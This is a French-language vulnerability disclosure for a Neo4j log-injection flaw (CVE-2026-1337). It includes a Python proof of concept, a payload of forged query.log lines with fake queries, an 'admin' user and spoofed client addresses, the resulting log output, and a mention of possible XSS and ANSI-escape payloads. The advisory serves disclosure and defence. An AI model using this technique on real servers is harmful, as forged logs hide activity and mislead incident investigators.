
CVE-2026-1337 - Neo4j - Injection de journaux
L'injection de logs par un utilisateur authentifié est possible dans le query.log de Neo4j lorsque Neo4j n'est pas configuré au format json.
Neo4j n'échappe pas les caractères de contrôle dans le champ metadata lors d'une transaction bolt. Un utilisateur authentifié pourrait envoyer des caractères de contrôle afin d'injecter de fausses entrées de journal en injectant des sauts de ligne, \n.
Dans le code POC ci-joint, ces requêtes sont ajoutées au query.log d'une manière qui les fait paraître légitimes, mais seule la première l'est. L'injection laisse également d'autres artefacts mal formatés dans les logs.
MATCH (n:RealQuery) RETURN n LIMIT 1
MATCH (n:FakeQuery1) RETURN n LIMIT 1
^ la seconde est injectée, elle n'est jamais exécutée
Essentiellement ceci :
with driver.session() as session:
tx = session.begin_transaction(metadata={"x": payload})
tx.run("RETURN 1")
tx.commit()
où payload est quelque chose comme
'\n
2025-12-05 13:08:34.148+0000 INFO Query started: id:700 - transaction id:100 - 0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/10.0.0.1:1337 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:FakeQuery1) RETURN n LIMIT 1 - {} - runtime=null - {}
2025-12-05 13:08:34.148+0000 INFO Query started: id:701 - transaction id:101 - 0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/192.168.1.50:4444 server/127.0.0.1:7687> neo4j - admin - MATCH (n:FakeQuery2) RETURN n LIMIT 1 - {} - runtime=null - {}
2025-12-05 13:08:34.148+0000 INFO id:700 - transaction id:100 - 1 ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/10.0.0.1:1337 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:FakeQuery1) RETURN n LIMIT 1 - {} - runtime=pipelined - {}
2025-12-05 13:08:34.148+0000 INFO id:701 - transaction id:101 - 2 ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/192.168.1.50:4444 server/127.0.0.1:7687> neo4j - admin - MATCH (n:FakeQuery2) RETURN n LIMIT 1 - {} - runtime=pipelined - {}
produit ce query.log :
2025-12-05 13:08:34.585+0000 INFO Query started: id:1 - transaction id:1 - 255 ms: (planning: 255, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/127.0.0.1:50422 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:RealQuery) RETURN n LIMIT 1 - {} - runtime=null - {}
2025-12-05 13:08:35.308+0000 INFO id:1 - transaction id:1 - 980 ms: (planning: 915, waiting: 0) - 312 B - 2 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/127.0.0.1:50422 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:RealQuery) RETURN n LIMIT 1 - {} - runtime=pipelined - {}
2025-12-05 13:08:35.333+0000 INFO Query started: id:2 - transaction id:2 - 10 ms: (planning: 10, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/127.0.0.1:50422 server/127.0.0.1:7687> neo4j - neo4j - RETURN 1 - {} - runtime=null - {x: ''
2025-12-05 13:08:34.148+0000 INFO Query started: id:700 - transaction id:100 - 0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/10.0.0.1:1337 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:FakeQuery1) RETURN n LIMIT 1 - {} - runtime=null - {}
2025-12-05 13:08:34.148+0000 INFO Query started: id:701 - transaction id:101 - 0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/192.168.1.50:4444 server/127.0.0.1:7687> neo4j - admin - MATCH (n:FakeQuery2) RETURN n LIMIT 1 - {} - runtime=null - {}
2025-12-05 13:08:34.148+0000 INFO id:700 - transaction id:100 - 1 ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/10.0.0.1:1337 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:FakeQuery1) RETURN n LIMIT 1 - {} - runtime=pipelined - {}
2025-12-05 13:08:34.148+0000 INFO id:701 - transaction id:101 - 2 ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/192.168.1.50:4444 server/127.0.0.1:7687> neo4j - admin - MATCH (n:FakeQuery2) RETURN n LIMIT 1 - {} - runtime=pipelined - {}'}
2025-12-05 13:08:35.370+0000 INFO id:2 - transaction id:2 - 47 ms: (planning: 44, waiting: 0) - 312 B - 1 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/127.0.0.1:50422 server/127.0.0.1:7687> neo4j - neo4j - RETURN 1 - {} - runtime=pipelined - {x: ''
2025-12-05 13:08:34.148+0000 INFO Query started: id:700 - transaction id:100 - 0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/10.0.0.1:1337 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:FakeQuery1) RETURN n LIMIT 1 - {} - runtime=null - {}
2025-12-05 13:08:34.148+0000 INFO Query started: id:701 - transaction id:101 - 0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/192.168.1.50:4444 server/127.0.0.1:7687> neo4j - admin - MATCH (n:FakeQuery2) RETURN n LIMIT 1 - {} - runtime=null - {}
2025-12-05 13:08:34.148+0000 INFO id:700 - transaction id:100 - 1 ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/10.0.0.1:1337 server/127.0.0.1:7687> neo4j - neo4j - MATCH (n:FakeQuery1) RETURN n LIMIT 1 - {} - runtime=pipelined - {}
2025-12-05 13:08:34.148+0000 INFO id:701 - transaction id:101 - 2 ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - bolt-session bolt neo4j-python/6.0.3 Python/3.13.9-final-0 (linux) client/192.168.1.50:4444 server/127.0.0.1:7687> neo4j - admin - MATCH (n:FakeQuery2) RETURN n LIMIT 1 - {} - runtime=pipelined - {}'}
python log_injection_poc.py --uri bolt://127.0.0.1:7687 --password secret123
Cela injectera de fausses entrées de journal dans le query.log.
L'absence d'échappement pourrait également être exploitée pour injecter, par exemple, des payloads XSS (un risque pour les applications web d'analyse de logs) ou des caractères d'échappement ANSI (un risque pour l'interaction avec les logs via un terminal).